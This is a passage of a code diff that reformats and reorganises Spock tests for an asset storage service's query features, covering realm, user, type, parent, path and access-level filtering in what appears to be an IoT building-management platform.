-        assets.get(4).id == managerTestSetup.apartment1Bedroom1Id
-        assets.get(5).id == managerTestSetup.apartment1BathroomId
-
-        when: "a query is executed that returns a protected attribute without any other meta items"
-        query = new AssetQuery()
-                .ids(managerTestSetup.apartment2LivingroomId)
-                .access(PROTECTED)
-        assets = assetStorageService.findAll(query)
-
-        then: "only one asset should be retrieved"
-        assets.size() == 1
-        assetStorageService.count(query) == 1
-        assets.get(0).id == managerTestSetup.apartment2LivingroomId
-        assets.get(0).getAttributes().size() == 2
-        assets.get(0).getAttribute("windowOpen").isPresent()
-        !assets.get(0).getAttribute("windowOpen").flatMap{it.value}.orElse(false)
-        !assets.get(0).getAttribute("windowOpen").get().getMeta().isEmpty()
-        assets.get(0).getAttribute("targetTemperature").isPresent()
-
-        when: "a recursive query is executed for apartment 1 assets"
-        query = new AssetQuery()
-                .ids(managerTestSetup.smartBuildingId)
-                .orderBy(new OrderBy(CREATED_ON))
-                .recursive(true)
-                .access(PROTECTED)
-        assets = assetStorageService.findAll(query)
-
-        then: "result should contain only basic info and attribute names"
-        assets.size() == 13
-        assetStorageService.count(query) == 13
-        assets.find {it.id == managerTestSetup.smartBuildingId}.name == "Smart building"
-        def apartment1 = assets.find {it.id == managerTestSetup.apartment1Id}
-        apartment1.name == "Apartment 1"
-        apartment1.type == BuildingAsset.DESCRIPTOR.getName()
-        apartment1.createdOn != null
-        apartment1.parentId == managerTestSetup.smartBuildingId
-        apartment1.realm == managerTestSetup.realmBuildingName
-        apartment1.getAttributes().size() == 8
-        apartment1.getAttribute("ventilationAuto").isPresent()
-        apartment1.getAttribute("ventilationLevel").isPresent()
-        apartment1.getAttribute("alarmEnabled").isPresent()
-        apartment1.getAttribute("vacationUntil").isPresent()
-        apartment1.getAttribute("lastExecutedScene").isPresent()
-        apartment1.getAttribute("presenceDetected").isPresent()
-        apartment1.getAttribute("location").isPresent()
-        !apartment1.getAttribute("alarmEnabled").get().meta.isEmpty()
-        assets.find {it.id == managerTestSetup.apartment1ServiceAgentId} != null
-        assets.find {it.id == managerTestSetup.apartment1LivingroomId} != null
-        assets.find {it.id == managerTestSetup.apartment1KitchenId} != null
-        assets.find {it.id == managerTestSetup.apartment1HallwayId} != null
-        assets.find {it.id == managerTestSetup.apartment1Bedroom1Id} != null
-        assets.find {it.id == managerTestSetup.apartment1BathroomId} != null
-        assets.find {it.id == managerTestSetup.apartment2Id} != null
-        assets.find {it.id == managerTestSetup.apartment2LivingroomId} != null
-        assets.find {it.id == managerTestSetup.apartment2BathroomId} != null
-        assets.find {it.id == managerTestSetup.apartment3Id} != null
-        assets.find {it.id == managerTestSetup.apartment3LivingroomId} != null
-
-        when: "a query is executed that excludes attributes"
-        def asset = assetStorageService.find(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .ids(managerTestSetup.smartOfficeId)
-        )
-
-        then: "result should match"
-        asset.id == managerTestSetup.smartOfficeId
-        asset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        asset.name == "Smart office"
-        asset.type == BuildingAsset.DESCRIPTOR.getName()
-        asset.parentId == null
-        asset.realm == keycloakTestSetup.realmMaster.name
-        asset.attributes.size() == 0
-
-        when: "a query is executed"
-        asset = assetStorageService.find(
-                new AssetQuery()
-                    .ids(managerTestSetup.smartOfficeId)
-        )
-
-        then: "result should match"
-        asset.id == managerTestSetup.smartOfficeId
-        asset.createdOn.toEpochMilli() < System.currentTimeMillis()
-        asset.name == "Smart office"
-        asset.type == BuildingAsset.DESCRIPTOR.getName()
-        asset.parentId == null
-        asset.realm == keycloakTestSetup.realmMaster.name
-        asset.path.length == 1
-        asset.path[0] == managerTestSetup.smartOfficeId
-        asset.getAttribute(BuildingAsset.STREET).flatMap{it.value}.orElse("") == "Torenallee 20"
-
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .parents(new ParentPredicate(null))
-                    .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-        )
-
-        then: "result should match"
-        assets.size() == 1
-        assets.get(0).id == managerTestSetup.smartOfficeId
-        assets.get(0).createdOn.toEpochMilli() < System.currentTimeMillis()
-        assets.get(0).name == "Smart office"
-        assets.get(0).type == BuildingAsset.DESCRIPTOR.getName()
-        assets.get(0).parentId == null
-        assets.get(0).realm == keycloakTestSetup.realmMaster.name
-        assets.get(0).attributes.size() == 0
-
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .parents(new ParentPredicate(null))
-                    .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-        )
-
-        then: "result should match"
-        assets.size() == 1
-        assets.get(0).id == managerTestSetup.smartOfficeId
-        assets.get(0).createdOn.toEpochMilli() < System.currentTimeMillis()
-        assets.get(0).name == "Smart office"
-        assets.get(0).type == BuildingAsset.DESCRIPTOR.getName()
-        assets.get(0).parentId == null
-        assets.get(0).realm == keycloakTestSetup.realmMaster.name
-        assets.get(0).path.length == 1
-        assets.get(0).path[0] == managerTestSetup.smartOfficeId
-        ((BuildingAsset)assets.get(0)).getStreet().orElse("") == "Torenallee 20"
-
-        when: "a query is executed"
-        query = new AssetQuery()
-                .select(new Select().excludeAttributes())
-                .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
-        assets = assetStorageService.findAll(query)
-
-        then: "result should match"
-        assets.size() == 3
-        assetStorageService.count(query) == 3
-        assets.get(0).id == managerTestSetup.apartment1Id
-        assets.get(0).createdOn.toEpochMilli() < System.currentTimeMillis()
-        assets.get(0).name == "Apartment 1"
-        assets.get(0).type == BuildingAsset.DESCRIPTOR.getName()
-        assets.get(0).parentId == managerTestSetup.smartBuildingId
-        assets.get(0).realm == keycloakTestSetup.realmBuilding.name
-        assets.get(0).attributes.size() == 0
-        assets.get(1).id == managerTestSetup.apartment2Id
-        assets.get(2).id == managerTestSetup.apartment3Id
-
-        when: "a query is executed"
-        query = new AssetQuery()
-                .select(new Select().excludeAttributes())
-                .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
-                .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
-        assets = assetStorageService.findAll(query)
-
-        then: "result should match"
-        assets.size() == 3
-        assetStorageService.count(query) == 3
-        assets.get(0).id == managerTestSetup.apartment1Id
-        assets.get(1).id == managerTestSetup.apartment2Id
-        assets.get(2).id == managerTestSetup.apartment3Id
-
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
-                    .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
-                    .orderBy(new OrderBy(NAME, true))
-        )
-
-        then: "result should match"
-        assets.size() == 3
-        assets.get(0).id == managerTestSetup.apartment3Id
-        assets.get(1).id == managerTestSetup.apartment2Id
-        assets.get(2).id == managerTestSetup.apartment1Id
-
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
-                    .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-        )
-
-        then: "result should match"
-        assets.size() == 0
-
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .paths(new PathPredicate(assetStorageService.find(managerTestSetup.apartment1Id, true).getPath()))
-        )
-
-        then: "result should match"
-        assets.size() == 7
-        assets.find {it.id == managerTestSetup.apartment1Id} != null
-        assets.find {it.id == managerTestSetup.apartment1ServiceAgentId} != null
-        assets.find {it.id == managerTestSetup.apartment1LivingroomId} != null
-        assets.find {it.id == managerTestSetup.apartment1KitchenId} != null
-        assets.find {it.id == managerTestSetup.apartment1HallwayId} != null
-        assets.find {it.id == managerTestSetup.apartment1Bedroom1Id} != null
-        assets.find {it.id == managerTestSetup.apartment1BathroomId} != null
-
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .paths(new PathPredicate(assetStorageService.find(managerTestSetup.apartment1Id, true).getPath()))
-                    .types(RoomAsset.class)
-        )
-
-        then: "result should match"
-        assets.size() == 5
-        assets.find {it.id == managerTestSetup.apartment1LivingroomId} != null
-        assets.find {it.id == managerTestSetup.apartment1KitchenId} != null
-        assets.find {it.id == managerTestSetup.apartment1HallwayId} != null
-        assets.find {it.id == managerTestSetup.apartment1Bedroom1Id} != null
-        assets.find {it.id == managerTestSetup.apartment1BathroomId} != null
-
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .userIds(keycloakTestSetup.testuser3Id)
-                    .access(PROTECTED)
-        )
-
-        then: "result should match"
-        assets.size() == 6
-        assets.find {it.id == managerTestSetup.apartment1Id} != null
-        def livingroom = assets.find {it.id == managerTestSetup.apartment1LivingroomId}
-        livingroom != null
-        livingroom.getAttributes().size() == 8
-        !livingroom.getAttribute("currentTemperature").get().getValue().isPresent()
-        !livingroom.getAttribute("currentTemperature").get().meta.isEmpty()
-        !livingroom.getAttribute("targetTemperature").get().getValue().isPresent()
-        !livingroom.getAttribute("targetTemperature").get().meta.isEmpty()
-        assets.find {it.id == managerTestSetup.apartment1KitchenId} != null
-        assets.find {it.id == managerTestSetup.apartment1HallwayId} != null
-        assets.find {it.id == managerTestSetup.apartment1Bedroom1Id} != null
-        assets.find {it.id == managerTestSetup.apartment1BathroomId} != null
-
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .userIds(keycloakTestSetup.testuser2Id)
-                    .access(PROTECTED)
-        )
-
-        then: "result should match"
-        assets.size() == 0
-
-        expect: "a result to match the executed query "
-        assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1Id)
-        assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1LivingroomId)
-        assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1HallwayId)
-        assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1KitchenId)
-        assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1Bedroom1Id)
-        assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1BathroomId)
-        !assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment2Id)
-        !assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment3Id)
-        !assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.smartOfficeId)
-    }
-
-    // Specs too large, split up features
-    def "Query assets 2"() {
-
-        when: "a query is executed"
-        def assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .types(Agent.class)
-        )
-
-        then: "result should match"
-        assets.size() == 3
-        assets.find {it.id == managerTestSetup.agentId} != null
-        assets.find {it.id == managerTestSetup.apartment1ServiceAgentId} != null
-        assets.find {it.id == managerTestSetup.smartCityServiceAgentId} != null
-
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
+    when: "an agent filtering query is executed"
+    def assets = assetStorageService.findAll(
             new AssetQuery()
-                .select(new Select().excludeAttributes())
-                .types(ThingAsset.class)
-                .parents(new ParentPredicate(managerTestSetup.agentId))
-        )
+            .types(Agent.class)
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            )
 
-        then: "result should match"
-        assets.size() == 1
-        assets.get(0).id == managerTestSetup.thingId
+    then: "agent assets should be retrieved"
+    assets.size() == 1
+    assets[0] instanceof SimulatorAgent
+    assets[0].id == managerTestSetup.agentId
+    assets[0].name == "Demo Agent"
+    assets[0].type == SimulatorAgent.DESCRIPTOR.name
+    assets[0].parentId == managerTestSetup.lobbyId
+    assets[0].realm == managerTestSetup.realmMasterName
 
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
+    when: "a user filtering query is executed"
+    def query = new AssetQuery().userIds(keycloakTestSetup.testuser3Id)
+    assets = assetStorageService.findAll(query)
+
+    then: "only the users assets should be retrieved"
+    assets.size() == 6
+    assetStorageService.count(query) == 6
+    assets.get(0).id == managerTestSetup.apartment1Id
+    assets.get(1).id == managerTestSetup.apartment1LivingroomId
+    assets.get(1).getAttributes().size() == 14
+    assets.get(1).getAttribute("motionSensor").isPresent()
+    !assets.get(1).getAttribute("currentTemperature").get().getValue().isPresent()
+    !assets.get(1).getAttribute("currentTemperature").get().meta.isEmpty()
+    !assets.get(1).getAttribute("targetTemperature").get().getValue().isPresent()
+    !assets.get(1).getAttribute("targetTemperature").get().meta.isEmpty()
+    assets.get(2).id == managerTestSetup.apartment1KitchenId
+    assets.get(3).id == managerTestSetup.apartment1HallwayId
+    assets.get(4).id == managerTestSetup.apartment1Bedroom1Id
+    assets.get(5).id == managerTestSetup.apartment1BathroomId
+
+    when: "a user filtering query is executed that limits to protected attributes"
+    query = new AssetQuery()
+            .userIds(keycloakTestSetup.testuser3Id)
+            .access(PROTECTED)
+    assets = assetStorageService.findAll(query)
+
+    then: "only the users assets should be retrieved"
+    assets.size() == 6
+    assetStorageService.count(query) == 6
+    assets.get(0).id == managerTestSetup.apartment1Id
+    assets.get(1).id == managerTestSetup.apartment1LivingroomId
+    assets.get(1).getAttributes().size() == 8
+    !assets.get(1).getAttribute("motionSensor").isPresent()
+    !assets.get(1).getAttribute("currentTemperature").get().getValue().isPresent()
+    !assets.get(1).getAttribute("currentTemperature").get().meta.isEmpty()
+    assets[1].getAttribute("currentTemperature").get().getMetaItem(LABEL).isPresent()
+    assets[1].getAttribute("currentTemperature").get().getMetaValue(LABEL).orElse("") == "Current temperature"
+    !assets.get(1).getAttribute("targetTemperature").get().getValue().isPresent()
+    !assets.get(1).getAttribute("targetTemperature").get().meta.isEmpty()
+    assets.get(2).id == managerTestSetup.apartment1KitchenId
+    assets.get(3).id == managerTestSetup.apartment1HallwayId
+    assets.get(4).id == managerTestSetup.apartment1Bedroom1Id
+    assets.get(5).id == managerTestSetup.apartment1BathroomId
+
+    when: "a query is executed that returns a protected attribute without any other meta items"
+    query = new AssetQuery()
+            .ids(managerTestSetup.apartment2LivingroomId)
+            .access(PROTECTED)
+    assets = assetStorageService.findAll(query)
+
+    then: "only one asset should be retrieved"
+    assets.size() == 1
+    assetStorageService.count(query) == 1
+    assets.get(0).id == managerTestSetup.apartment2LivingroomId
+    assets.get(0).getAttributes().size() == 2
+    assets.get(0).getAttribute("windowOpen").isPresent()
+    !assets.get(0).getAttribute("windowOpen").flatMap{it.value}.orElse(false)
+    !assets.get(0).getAttribute("windowOpen").get().getMeta().isEmpty()
+    assets.get(0).getAttribute("targetTemperature").isPresent()
+
+    when: "a recursive query is executed for apartment 1 assets"
+    query = new AssetQuery()
+            .ids(managerTestSetup.smartBuildingId)
+            .orderBy(new OrderBy(CREATED_ON))
+            .recursive(true)
+            .access(PROTECTED)
+    assets = assetStorageService.findAll(query)
+
+    then: "result should contain only basic info and attribute names"
+    assets.size() == 13
+    assetStorageService.count(query) == 13
+    assets.find {it.id == managerTestSetup.smartBuildingId}.name == "Smart building"
+    def apartment1 = assets.find {it.id == managerTestSetup.apartment1Id}
+    apartment1.name == "Apartment 1"
+    apartment1.type == BuildingAsset.DESCRIPTOR.getName()
+    apartment1.createdOn != null
+    apartment1.parentId == managerTestSetup.smartBuildingId
+    apartment1.realm == managerTestSetup.realmBuildingName
+    apartment1.getAttributes().size() == 8
+    apartment1.getAttribute("ventilationAuto").isPresent()
+    apartment1.getAttribute("ventilationLevel").isPresent()
+    apartment1.getAttribute("alarmEnabled").isPresent()
+    apartment1.getAttribute("vacationUntil").isPresent()
+    apartment1.getAttribute("lastExecutedScene").isPresent()
+    apartment1.getAttribute("presenceDetected").isPresent()
+    apartment1.getAttribute("location").isPresent()
+    !apartment1.getAttribute("alarmEnabled").get().meta.isEmpty()
+    assets.find {it.id == managerTestSetup.apartment1ServiceAgentId} != null
+    assets.find {it.id == managerTestSetup.apartment1LivingroomId} != null
+    assets.find {it.id == managerTestSetup.apartment1KitchenId} != null
+    assets.find {it.id == managerTestSetup.apartment1HallwayId} != null
+    assets.find {it.id == managerTestSetup.apartment1Bedroom1Id} != null
+    assets.find {it.id == managerTestSetup.apartment1BathroomId} != null
+    assets.find {it.id == managerTestSetup.apartment2Id} != null
+    assets.find {it.id == managerTestSetup.apartment2LivingroomId} != null
+    assets.find {it.id == managerTestSetup.apartment2BathroomId} != null
+    assets.find {it.id == managerTestSetup.apartment3Id} != null
+    assets.find {it.id == managerTestSetup.apartment3LivingroomId} != null
+
+    when: "a query is executed that excludes attributes"
+    def asset = assetStorageService.find(
             new AssetQuery()
-                .select(new Select().excludeAttributes())
-                .types(ThingAsset)
-                .parents(new ParentPredicate(managerTestSetup.agentId))
-        )
+            .select(new Select().excludeAttributes())
+            .ids(managerTestSetup.smartOfficeId)
+            )
 
-        then: "result should match"
-        assets.size() == 1
-        assets.get(0).id == managerTestSetup.thingId
+    then: "result should match"
+    asset.id == managerTestSetup.smartOfficeId
+    asset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    asset.name == "Smart office"
+    asset.type == BuildingAsset.DESCRIPTOR.getName()
+    asset.parentId == null
+    asset.realm == keycloakTestSetup.realmMaster.name
+    asset.attributes.size() == 0
 
-
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
-                    .attributes(
-                        new AttributePredicate().meta(
-                            new NameValuePredicate(READ_ONLY, new BooleanPredicate(true))
-                        )
-                    )
-        )
-
-        then: "result should match"
-        assets.size() == 2
-        assets.any{it.id == managerTestSetup.agentId}
-        assets.any{it.id == managerTestSetup.thingId}
-
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
+    when: "a query is executed"
+    asset = assetStorageService.find(
             new AssetQuery()
-                .select(new Select().excludeAttributes())
-                .attributes(
+            .ids(managerTestSetup.smartOfficeId)
+            )
+
+    then: "result should match"
+    asset.id == managerTestSetup.smartOfficeId
+    asset.createdOn.toEpochMilli() <System.currentTimeMillis()
+    asset.name == "Smart office"
+    asset.type == BuildingAsset.DESCRIPTOR.getName()
+    asset.parentId == null
+    asset.realm == keycloakTestSetup.realmMaster.name
+    asset.path.length == 1
+    asset.path[0] == managerTestSetup.smartOfficeId
+    asset.getAttribute(BuildingAsset.STREET).flatMap{it.value}.orElse("") == "Torenallee 20"
+
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .parents(new ParentPredicate(null))
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            )
+
+    then: "result should match"
+    assets.size() == 1
+    assets.get(0).id == managerTestSetup.smartOfficeId
+    assets.get(0).createdOn.toEpochMilli() <System.currentTimeMillis()
+    assets.get(0).name == "Smart office"
+    assets.get(0).type == BuildingAsset.DESCRIPTOR.getName()
+    assets.get(0).parentId == null
+    assets.get(0).realm == keycloakTestSetup.realmMaster.name
+    assets.get(0).attributes.size() == 0
+
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .parents(new ParentPredicate(null))
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            )
+
+    then: "result should match"
+    assets.size() == 1
+    assets.get(0).id == managerTestSetup.smartOfficeId
+    assets.get(0).createdOn.toEpochMilli() <System.currentTimeMillis()
+    assets.get(0).name == "Smart office"
+    assets.get(0).type == BuildingAsset.DESCRIPTOR.getName()
+    assets.get(0).parentId == null
+    assets.get(0).realm == keycloakTestSetup.realmMaster.name
+    assets.get(0).path.length == 1
+    assets.get(0).path[0] == managerTestSetup.smartOfficeId
+    ((BuildingAsset)assets.get(0)).getStreet().orElse("") == "Torenallee 20"
+
+    when: "a query is executed"
+    query = new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
+    assets = assetStorageService.findAll(query)
+
+    then: "result should match"
+    assets.size() == 3
+    assetStorageService.count(query) == 3
+    assets.get(0).id == managerTestSetup.apartment1Id
+    assets.get(0).createdOn.toEpochMilli() <System.currentTimeMillis()
+    assets.get(0).name == "Apartment 1"
+    assets.get(0).type == BuildingAsset.DESCRIPTOR.getName()
+    assets.get(0).parentId == managerTestSetup.smartBuildingId
+    assets.get(0).realm == keycloakTestSetup.realmBuilding.name
+    assets.get(0).attributes.size() == 0
+    assets.get(1).id == managerTestSetup.apartment2Id
+    assets.get(2).id == managerTestSetup.apartment3Id
+
+    when: "a query is executed"
+    query = new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
+            .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
+    assets = assetStorageService.findAll(query)
+
+    then: "result should match"
+    assets.size() == 3
+    assetStorageService.count(query) == 3
+    assets.get(0).id == managerTestSetup.apartment1Id
+    assets.get(1).id == managerTestSetup.apartment2Id
+    assets.get(2).id == managerTestSetup.apartment3Id
+
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
+            .realm(new RealmPredicate(keycloakTestSetup.realmBuilding.name))
+            .orderBy(new OrderBy(NAME, true))
+            )
+
+    then: "result should match"
+    assets.size() == 3
+    assets.get(0).id == managerTestSetup.apartment3Id
+    assets.get(1).id == managerTestSetup.apartment2Id
+    assets.get(2).id == managerTestSetup.apartment1Id
+
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .parents(new ParentPredicate(managerTestSetup.smartBuildingId))
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            )
+
+    then: "result should match"
+    assets.size() == 0
+
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .paths(new PathPredicate(assetStorageService.find(managerTestSetup.apartment1Id, true).getPath()))
+            )
+
+    then: "result should match"
+    assets.size() == 7
+    assets.find {it.id == managerTestSetup.apartment1Id} != null
+    assets.find {it.id == managerTestSetup.apartment1ServiceAgentId} != null
+    assets.find {it.id == managerTestSetup.apartment1LivingroomId} != null
+    assets.find {it.id == managerTestSetup.apartment1KitchenId} != null
+    assets.find {it.id == managerTestSetup.apartment1HallwayId} != null
+    assets.find {it.id == managerTestSetup.apartment1Bedroom1Id} != null
+    assets.find {it.id == managerTestSetup.apartment1BathroomId} != null
+
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .paths(new PathPredicate(assetStorageService.find(managerTestSetup.apartment1Id, true).getPath()))
+            .types(RoomAsset.class)
+            )
+
+    then: "result should match"
+    assets.size() == 5
+    assets.find {it.id == managerTestSetup.apartment1LivingroomId} != null
+    assets.find {it.id == managerTestSetup.apartment1KitchenId} != null
+    assets.find {it.id == managerTestSetup.apartment1HallwayId} != null
+    assets.find {it.id == managerTestSetup.apartment1Bedroom1Id} != null
+    assets.find {it.id == managerTestSetup.apartment1BathroomId} != null
+
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .userIds(keycloakTestSetup.testuser3Id)
+            .access(PROTECTED)
+            )
+
+    then: "result should match"
+    assets.size() == 6
+    assets.find {it.id == managerTestSetup.apartment1Id} != null
+    def livingroom = assets.find {it.id == managerTestSetup.apartment1LivingroomId}
+    livingroom != null
+    livingroom.getAttributes().size() == 8
+    !livingroom.getAttribute("currentTemperature").get().getValue().isPresent()
+    !livingroom.getAttribute("currentTemperature").get().meta.isEmpty()
+    !livingroom.getAttribute("targetTemperature").get().getValue().isPresent()
+    !livingroom.getAttribute("targetTemperature").get().meta.isEmpty()
+    assets.find {it.id == managerTestSetup.apartment1KitchenId} != null
+    assets.find {it.id == managerTestSetup.apartment1HallwayId} != null
+    assets.find {it.id == managerTestSetup.apartment1Bedroom1Id} != null
+    assets.find {it.id == managerTestSetup.apartment1BathroomId} != null
+
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .userIds(keycloakTestSetup.testuser2Id)
+            .access(PROTECTED)
+            )
+
+    then: "result should match"
+    assets.size() == 0
+
+    expect: "a result to match the executed query "
+    assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1Id)
+    assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1LivingroomId)
+    assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1HallwayId)
+    assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1KitchenId)
+    assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1Bedroom1Id)
+    assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment1BathroomId)
+    !assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment2Id)
+    !assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.apartment3Id)
+    !assetStorageService.isUserAsset(keycloakTestSetup.testuser3Id, managerTestSetup.smartOfficeId)
+  }
+
+  // Specs too large, split up features
+  def "Query assets 2"() {
+
+    when: "a query is executed"
+    def assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .types(Agent.class)
+            )
+
+    then: "result should match"
+    assets.size() == 3
+    assets.find {it.id == managerTestSetup.agentId} != null
+    assets.find {it.id == managerTestSetup.apartment1ServiceAgentId} != null
+    assets.find {it.id == managerTestSetup.smartCityServiceAgentId} != null
+
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .types(ThingAsset.class)
+            .parents(new ParentPredicate(managerTestSetup.agentId))
+            )
+
+    then: "result should match"
+    assets.size() == 1
+    assets.get(0).id == managerTestSetup.thingId
+
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .types(ThingAsset)
+            .parents(new ParentPredicate(managerTestSetup.agentId))
+            )
+
+    then: "result should match"
+    assets.size() == 1
+    assets.get(0).id == managerTestSetup.thingId
+
+
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .realm(new RealmPredicate(keycloakTestSetup.realmMaster.name))
+            .attributes(
                     new AttributePredicate().meta(
-                        new NameValuePredicate(UNITS.name, new ArrayPredicate(Constants.UNITS_KILO, 0, 3, null, null, false))
+                            new NameValuePredicate(READ_ONLY, new BooleanPredicate(true))
+                            )
                     )
-                )
-        )
+            )
 
-        then: "result should match"
-        assets.size() == 1
-        assets.get(0).id == managerTestSetup.thingId
+    then: "result should match"
+    assets.size() == 2
+    assets.any{it.id == managerTestSetup.agentId}
+    assets.any{it.id == managerTestSetup.thingId}
 
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
             new AssetQuery()
-                .select(new Select().excludeAttributes())
-                .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
-        )
+            .select(new Select().excludeAttributes())
+            .attributes(
+                    new AttributePredicate().meta(
+                            new NameValuePredicate(UNITS.name, new ArrayPredicate(Constants.UNITS_KILO, 0, 3, null, null, false))
+                            )
+                    )
+            )
 
-        then: "result should match"
-        assets.size() == 1
-        assets.get(0).id == managerTestSetup.thingId
+    then: "result should match"
+    assets.size() == 1
+    assets.get(0).id == managerTestSetup.thingId
 
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
-                    .names(new StringPredicate(Match.CONTAINS, false, "thing"))
-        )
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
+            )
 
-        then: "result should match"
-        assets.size() == 1
-        assets.get(0).id == managerTestSetup.thingId
+    then: "result should match"
+    assets.size() == 1
+    assets.get(0).id == managerTestSetup.thingId
 
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
-                    .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
-                    .names(new StringPredicate(Match.CONTAINS, true, "thing"))
-        )
+    when: "a query is executed"
+    assets = assetStorageService.findAll(
+            new AssetQuery()
+            .select(new Select().excludeAttributes())
+            .attributes(new AttributePredicate().meta(new NameValuePredicate(AGENT_LINK, new StringPredicate(managerTestSetup.agentId), false, new NameValuePredicate.Path("id"))))
+            .names(new StringPredicate(Match.CONTAINS, false, "thing"))
+            )
 
-        then: "result should match"
-        assets.size() == 0
+    then: "result should match"
+    assets.size() == 1
+    assets.get(0).id == managerTestSetup.thingId
 
-        when: "a query is executed"
-        assets = assetStorageService.findAll(
-                new AssetQuery()
-                    .select(new Select().excludeAttributes())
